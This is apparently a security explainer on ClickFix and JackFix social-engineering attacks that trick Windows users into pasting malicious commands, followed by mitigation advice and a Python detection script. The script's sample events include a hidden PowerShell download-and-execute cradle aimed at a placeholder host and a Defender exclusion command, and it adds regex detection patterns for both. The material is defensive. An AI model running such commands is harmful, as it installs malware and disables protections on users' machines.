A ClickFix attack is a phishing or social engineering technique designed to trick users into executing malicious commands directly on their Windows computers. It typically involves displaying a fake error message or technical issue (e.g., a pop-up claiming a system problem such as a corrupted file or a security alert). The message then instructs the victim to “fix” the issue by copying and pasting a provided string of code into the Windows Run dialog (accessible via Win+R). This code often downloads and installs malware, such as infostealers or trojans, and frequently bypasses traditional antivirus detection because the execution happens through legitimate OS features rather than an exploit.
These attacks rely on creating a sense of urgency or confusion without overwhelming pressure, making the action seem like a logical troubleshooting step. They are commonly spread via malvertising, compromised websites, or email links.
What is JackFix?
JackFix is a more advanced and aggressive variant of the ClickFix attack, first observed in late November 2025. It builds on the core ClickFix method but incorporates heightened psychological manipulation to increase success rates. The name “JackFix” is a play on “hijack” (due to the screen takeover) combined with “ClickFix.”
How JackFix Works
1. Initial Lure: Victims are directed to fake adult (pornography) websites via malvertising or phishing links. These sites mimic legitimate platforms but are controlled by attackers.
2. Screen Hijacking: Once the user interacts (e.g., clicks play on a video), a full-screen overlay appears, impersonating a critical Windows Update or security patch screen. This includes:
• A realistic progress bar, loading animation, and error messages (e.g., “Update failed – requires manual intervention”).
• Blocked keyboard shortcuts (like Alt+Tab or Ctrl+Alt+Del) to prevent easy escape, creating a “locked” feeling similar to older ransomware screen lockers.
3. Manipulation Phase: The fake update instructs the user to “resolve” the issue by running specific commands in the Windows Run dialog or PowerShell. These commands also have the user grant admin privileges and weaken security features, for example by adding Microsoft Defender exclusions.
4. Malware Delivery: Upon compliance, a heavily obfuscated PowerShell script downloads and executes up to eight malware samples in a “spray and pray” approach. The script uses runtime reconstruction of commands (e.g., encoding JavaScript into arrays) to evade static analysis tools.
The locked screen and fake update failure create intense anxiety, making users more likely to follow instructions without questioning them.
Key Differences from Traditional ClickFix
• Pressure Tactics: ClickFix uses mild prompts; JackFix employs full-screen locks and anxiety-inducing visuals for stronger coercion.
• Evasion Techniques: JackFix URLs redirect benign direct visitors (e.g., to Google) but only serve malware via the attack chain, complicating detection. It also dynamically rebuilds malicious code in memory.
• Effectiveness: Early reports suggest higher infection rates due to the immersive lure and context (e.g., tying the “fix” to a believable update failure).
Targets and Scope
• Primarily individual users browsing adult content, with infections reported in the US and Europe.
• Attributed to Russian-speaking cybercriminals, active as of November 25, 2025.
Malware Involved
JackFix delivers a mix of commercial off-the-shelf malware, including:
• Infostealers: Raccoon, Vidar 2.0, RedLine.
• Loaders/Droppers: Amadey and others.
This combination allows attackers to steal credentials, browser data, and crypto wallets.
Mitigations and Advice
• Disable Run Dialog: Use Group Policy (gpedit.msc) to restrict access to the Run dialog for non-admin users who do not need it.
• Browser Protections: Limit full-screen mode via extensions or settings (e.g., in Chrome/Edge).
• General Best Practices: Avoid suspicious sites, enable real-time antivirus scanning, keep Windows updated via official channels, and use ad-blockers. If you encounter a suspicious pop-up, close the browser via Task Manager instead of interacting.
• Security tools like Microsoft Defender may detect some payloads, but behavioral monitoring is key for these social engineering attacks.
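As an added defensive example (not from the original article), the following Python script applies the behavioral-monitoring point above to constructed process-creation events: it flags script hosts launched from explorer.exe, which is how a command pasted into the Run dialog shows up in process telemetry, when the command line carries the indicators this campaign relies on (hidden window, encoded or policy-bypassing PowerShell, download cradles, Defender exclusions). The event field names and sample command lines are assumptions constructed for the example.

```python
import re
from os.path import basename

# Constructed process-creation events in the shape of Sysmon Event ID 1 / Windows
# 4688 telemetry (field names are an assumption, not a real log format).
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell -w hidden -ep bypass -c "iwr http://example.invalid/u.ps1 | iex"'},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd /c powershell -EncodedCommand SQBFAFgA"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell Add-MpPreference -ExclusionPath C:\Users\Public"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe", "cmd": "notepad.exe"},
    # Benign scheduled-task style launch: same flags, but not from an interactive parent.
    {"parent": r"C:\Windows\System32\svchost.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]

# A command pasted into the Run dialog (Win+R) is spawned by explorer.exe, so the
# rule is scoped to script hosts whose parent is an interactive shell.
INTERACTIVE_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Command-line indicators; patterns accept PowerShell's abbreviated parameters.
INDICATORS = {
    "encoded_command": re.compile(r"(?i)(?<![\w-])-e(?:ncodedcommand|nc|c)?(?=\s)"),
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "execution_policy_bypass": re.compile(r"(?i)-e(?:p|xecutionpolicy)\s+bypass"),
    "download_cradle": re.compile(r"(?i)\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b"),
    "invoke_expression": re.compile(r"(?i)\b(?:iex|invoke-expression)\b"),
    "defender_exclusion": re.compile(r"(?i)\b(?:add|set)-mppreference\b"),
}

def _exe(path):
    return basename(path.replace("\\", "/")).lower()

def score_event(event):
    """Return the indicator names hit by one event; [] when out of scope or clean."""
    if _exe(event["parent"]) not in INTERACTIVE_PARENTS or _exe(event["image"]) not in SCRIPT_HOSTS:
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(event["cmd"])]

def find_clickfix_candidates(events):
    """Return (index, hits) for every event with at least one indicator."""
    return [(i, hits) for i, ev in enumerate(events) if (hits := score_event(ev))]

if __name__ == "__main__":
    for i, hits in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"event {i}: {', '.join(hits)} :: {SAMPLE_EVENTS[i]['cmd']}")
```

Scoping to the interactive parent keeps routine scheduled-task PowerShell (last sample event) out of the alert queue even though it uses an execution-policy bypass.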
This campaign highlights evolving threats in malvertising—stay vigilant, especially on high-risk sites.